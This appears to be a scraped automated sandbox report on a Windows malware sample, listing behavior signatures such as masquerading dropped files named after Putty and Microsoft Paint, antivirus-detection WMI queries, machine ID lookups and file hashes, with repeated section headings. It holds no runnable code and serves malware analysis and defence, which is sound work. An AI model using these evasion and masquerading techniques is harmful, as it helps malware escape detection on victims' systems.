Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exe	Queries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exe	Queries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exe	Queries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Windows Analysis Report
ptKNiAaGus.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1466956
Product:	CloudBasic
Start time:	15:48:05
Start date:	03.07.2024
Sample:	ptKNiAaGus.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	4410af8bec1266d76029f9bb042c6a73
SHA1:	632a7eadf55f09d8ba0d9641ae1adaa921aaf5fa
SHA256:	04783068a4bc4ce6a3f2e8ed35d40528b84ddb9c1a0ad2f39fb5634eb5f8295a
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xdwdMicrosoft Paint.exe.log	CSV text	15332C93136041700B0E3D5AEB01CFCE	77EBA09260200C3EA967778E460A7A0D83A2E152	5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xdwdPutty.exe.log	CSV text	15332C93136041700B0E3D5AEB01CFCE	77EBA09260200C3EA967778E460A7A0D83A2E152	5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\z4wwumki.3zg.exe.log	CSV text	15332C93136041700B0E3D5AEB01CFCE	77EBA09260200C3EA967778E460A7A0D83A2E152	5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bualqehm.tg1.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvdx4sk4.juy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofa54sbh.fmc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyfizagb.qiw.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	BFC9AA287C7AFD68C03066A887B123AE	3819C6679BBA7ABC77149C0760022B8721CC8FEC	0BCB524EAA5BE4D110C59D8AD0268187D5F1F283268B43A95ED49642FD8F7CC4
C:\Users\user\Videos\xdwdPutty.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	D843D2F7E8D6DD8B1490C0EABA86F5CC	10C77F4BADE67D5B918DF573C4A2D15F1E829186	F9D2399892094D566D8C0C0841A2ED5EE520D892A5565D12B315E1058B968334
C:\Users\user\xdwdPutty.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	8BBEF39EBACCBCCEF26BE354545B98BD	7CA909801E7CBDA26A80AB62FCB0E64A14F2FDD8	BC7E76E22B7E37571D5DF21EE886939DDACD95DCF3FEAEF8B2498369CF30965E

Windows Analysis Report ptKNiAaGus.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
ptKNiAaGus.exe